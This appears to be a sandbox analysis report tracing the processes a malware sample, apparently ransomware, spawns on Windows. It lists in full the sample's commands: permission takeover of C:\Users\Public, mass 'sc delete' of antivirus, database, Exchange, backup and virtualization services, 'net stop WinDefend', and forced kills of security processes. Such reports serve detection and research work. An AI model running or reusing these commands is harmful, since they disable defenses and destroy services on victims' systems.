C:\Windows\SysWOW64\takeown.exetakeown /f C:\Users\Public /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHM4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmickvpexchange"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicguestinterface"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicshutdown"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicheartbeat"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicrdv"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "storflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmictimesync"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicvss"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "hvdsvc"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "nvspwmi"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "wmms"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "AvgAdminServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "AVG Antivirus"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "avgAdminClient"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SAVService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SAVAdminService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos AutoUpdate Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Clean Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Device Control Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos File Scanner Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Health Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Agent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Client"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SntpService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "swc_service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "swi_service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos UI"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "swi_update"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Web Control Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos System Protection Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Safestore Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "hmpalertsvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "RpcEptMapper"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SophosFIM"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swi_filter"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdGuardianDefaultInstance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdServerDefaultInstance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLSERVER"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLSERVERAGENT"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLBrowser"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer130"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SSISTELEMETRY130"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLWriter"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerADHelper100"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerOLAPService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer100"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY$HL"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TMBMServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$PROGID"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$PROGID"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$OPTIMA"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "msftesql$SQLEXPRESS"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "postgresql-x64-9.4"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "WRSVC"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ekrn"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ekrnEpsw"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klim6"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "AVP18.0.0"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "KLIF"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klpd"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupdisk"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klkbdflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klmouflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klhk"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "KSDE1.0.0"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "kltap"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ScSecSvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Core Mail Protection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning Server"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning ServerEx"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Online Protection System"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "RepairService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Core Browsing Protection"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Quick Update Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "McAfeeFramework"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "macmnsvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "masvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "mfemms"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "mfevtp"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmFilter"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TMLWCSService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "tmusa"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmPreFilter"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TMSmartRelayService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TMiCRCScanService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "VSApiNt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmCCSF"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "tmlisten"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmProxy"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ntrtscan"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ofcservice"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmPfw"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PccNTUpd"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PandaAetherAgent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PSUAService"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QPCore4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NanoServiceMain"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPIntegrationService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPProtectedService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPRedline"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPSecurityService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPUpdateService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UniFi"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im PccNTMon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im NTRtScan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmListen.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmCCSF.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmProxy.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TMBMSRV.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TMBMSRV.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmPfw.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im CNTAoSMgr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlbrowser.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlwriter.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlservr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im msmdsrv.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im MsDtsSrvr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlceip.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdlauncher.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im Ssms.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im SQLAGENT.EXE3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdhost.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdlauncher.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlservr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im ReportingServicesService.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im msftesql.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im pg_ctl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im postgres.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$MSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$MSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Synology Drive VSS Service x64"5⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
C:\Windows\SysWOW64\net.exenet stop mr2kserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mr2kserv4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFBA3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFBA4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSA3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA4⤵
-
C:\Windows\SysWOW64\net.exenet stop ShadowProtectSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShadowProtectSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop SPAdminV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPAdminV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPTimerV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPTimerV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPTraceV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPTraceV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPUserCodeV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPUserCodeV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPWriterV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPWriterV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPSearch43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPSearch44⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop IISADMIN3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISADMIN4⤵
-
C:\Windows\SysWOW64\net.exenet stop firebirdguardiandefaultinstance3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop firebirdguardiandefaultinstance4⤵
-
C:\Windows\SysWOW64\net.exenet stop ibmiasrw3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ibmiasrw4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMonitorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBPOSDBServiceV123⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBPOSDBServiceV124⤵
-
C:\Windows\SysWOW64\net.exenet stop "IBM Domino Server (CProgramFilesIBMDominodata)"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"4⤵
-
C:\Windows\SysWOW64\net.exenet stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"4⤵
-
C:\Windows\SysWOW64\net.exenet stop IISADMIN3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISADMIN4⤵
-
C:\Windows\SysWOW64\net.exenet stop "Simply Accounting Database Connection Manager"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"4⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB13⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB14⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB23⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB24⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB33⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB34⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB44⤵
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB53⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB54⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im UniFi.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq MsMpEng.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq ntrtscan.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq avp.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq WRSA.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq egui.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq AvastUI.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "XT800Service_Personal"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLWriter4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLSERVERAGENT4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLBrowser4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLFDLauncher4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLSERVER4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete QcSoftService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLServerOLAPService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete VMTools4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete VGAuthService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSDTC4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete TeamViewer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ReportServer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RabbitMQ4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "AHS SERVICE"4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sense Shield Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SSMonitorService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdAppService13004⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLAgent$SQL20084⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSSQL$SQL20084⤵
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdTaskService13004⤵
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdUpgradeService13004⤵
-
C:\Windows\SysWOW64\sc.exesc delete VirboxWebServer4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete jhi_service4⤵
-
C:\Windows\SysWOW64\sc.exesc delete LMS4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "FontCache3.0.0.0"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "OSP Service"4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete SSSyncService4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "DAService_TCP"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "eCard-TTransServer"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete eCardMPService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete EnergyDataService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete UI0Detect4⤵
-
C:\Windows\SysWOW64\sc.exesc delete K3MobileService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete TCPIDDAService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete WebAttendServer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete UIODetect4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "wanxiao-monitor"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete VMAuthdService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete VMUSBArbService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete VMwareHostd4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vm-agent"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OpenSSHd4⤵
-
C:\Windows\SysWOW64\sc.exesc delete eSightService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete apachezt4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Jenkins4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete secbizsrv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLTELEMETRY4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete smtpsvrJT4⤵
-
C:\Windows\SysWOW64\sc.exesc delete zyb_sync4⤵
-
C:\Windows\SysWOW64\sc.exesc delete 360EntHttpServer4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete 360EntSvc4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete NFWebServer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete wampapache4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MSSEARCH4⤵
-
C:\Windows\SysWOW64\sc.exesc delete msftesql4⤵
-
C:\Windows\SysWOW64\sc.exesc delete 360EntClientSvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSMQ4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SyncBASE Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleMTSRecoveryService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleDBConcoleorcl4⤵
-
C:\Windows\SysWOW64\sc.exesc delete VmAgentDaemon4⤵
-
